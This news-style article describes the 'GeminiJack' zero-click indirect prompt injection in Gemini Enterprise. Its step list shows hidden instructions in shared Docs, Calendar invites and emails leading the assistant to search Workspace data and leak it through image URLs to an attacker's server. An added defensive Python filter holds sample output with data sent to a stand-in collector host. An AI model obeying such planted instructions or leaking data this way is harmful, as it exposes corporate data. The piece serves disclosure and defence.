**GeminiJack Zero-Click Flaw Exposed Corporate Data**

A devastating zero-click flaw, dubbed GeminiJack, was discovered in Google's Gemini Enterprise platform, allowing attackers to exfiltrate sensitive corporate data without any warning signs or user interaction. This vulnerability highlights the growing threat of AI-native attacks and underscores the need for enhanced security measures.

**How it Works: A Simple yet Sinister Attack**

GeminiJack exploited a weakness in the RAG (Retrieval-Augmented Generation) system, which integrates generative AI capabilities into Google's productivity tools like Gmail, Calendar, Docs, and other Workspace apps. The attackers embedded hidden instructions in shared documents, calendar invitations, or emails, making it possible to access and extract corporate data without any user clicks.

The attack process can be broken down as follows:

1. **Indirect Prompt Injection**: Attackers plant hidden commands within accessible content such as Google Docs, Calendar invites, or Gmail subjects.
2. **Retrieval of Poisoned Content**: When an employee performs a normal search (e.g., "find all documents with Sales"), the RAG system retrieves the poisoned content and feeds it to Gemini.
3. **Execution of Instructions**: Gemini interprets the embedded instructions as legitimate, performing broad searches across connected Workspace data and exfiltrating results by embedding them in an image tag that sends an HTTP request to the attacker's server.
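
A defensive output filter for the exfiltration channel in step 3, as an added example that is not from the original article or from Google's fix: it removes auto-loading image references to hosts outside an allowlist before model output is rendered, and returns the blocked URLs for alerting. The allowlist, host names and sample text are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts this deployment trusts to serve images (hypothetical value).
ALLOWED_IMAGE_HOSTS = {"intranet.example.com"}

# HTML <img src=...> and Markdown ![alt](url) both trigger an HTTP request on render.
HTML_IMG = re.compile(r"<img\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)[^>]*>", re.I)
MD_IMG = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)")


def _is_allowed(url):
    """Allow only https URLs whose host is on the allowlist."""
    try:
        parts = urlsplit(url)
    except ValueError:  # malformed URL: treat as untrusted
        return False
    host = (parts.hostname or "").lower()
    return parts.scheme == "https" and host in ALLOWED_IMAGE_HOSTS


def sanitize_model_output(text):
    """Return (safe_text, blocked_urls); untrusted images are replaced by a marker."""
    blocked = []

    def _replace(match):
        url = match.group(1)
        if _is_allowed(url):
            return match.group(0)
        blocked.append(url)  # keep for logging and detection
        return "[image removed]"

    text = HTML_IMG.sub(_replace, text)
    text = MD_IMG.sub(_replace, text)
    return text, blocked


# Constructed sample of model output carrying retrieved data in image URLs.
SAMPLE = (
    "Here are the Sales documents you asked for.\n"
    '<img src="https://collector.invalid/p.png?d=Q3%20forecast%20draft">\n'
    "![logo](https://intranet.example.com/logo.png)\n"
    "![x](https://collector.invalid/a.png?d=budget)"
)

if __name__ == "__main__":
    safe, blocked = sanitize_model_output(SAMPLE)
    print(safe)
    print("blocked:", blocked)
```

A non-empty `blocked` list on a response built from retrieved content is itself a useful detection signal, independent of whether rendering was prevented.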

**The AI-powered Attack: A New Class of Vulnerabilities**

GeminiJack reveals a disturbing trend – AI tools accessing Gmail, Docs, and Calendar create a new attack surface. By manipulating the AI, attackers can compromise data, signifying a rising class of AI-native vulnerabilities. This flaw has demonstrated that even AI systems designed to enhance productivity and efficiency can be exploited for malicious purposes.

**Google's Quick Fix: A Beacon of Hope**

The researchers discovered the vulnerability on May 6th, 2025, and reported it to the Google Security Team. In collaboration with the researchers, Google quickly addressed the issue by fixing the RAG pipeline flaw that allowed malicious content to be misinterpreted as instructions. This swift response highlights the importance of proactive security measures in mitigating AI-powered attacks.

**The Implications: A Call to Action**

GeminiJack serves as a stark reminder of the evolving security landscape as AI systems become deeply integrated with organizational data. While Google has addressed this specific issue, the broader category of indirect prompt injection attacks against RAG systems requires continued attention from the security community.

In conclusion, GeminiJack has exposed a fundamental shift in how we must think about enterprise security. As AI-powered tools become increasingly prevalent, it is essential to adapt our security strategies to address these new vulnerabilities and ensure that AI systems do not become backdoors for malicious actors.
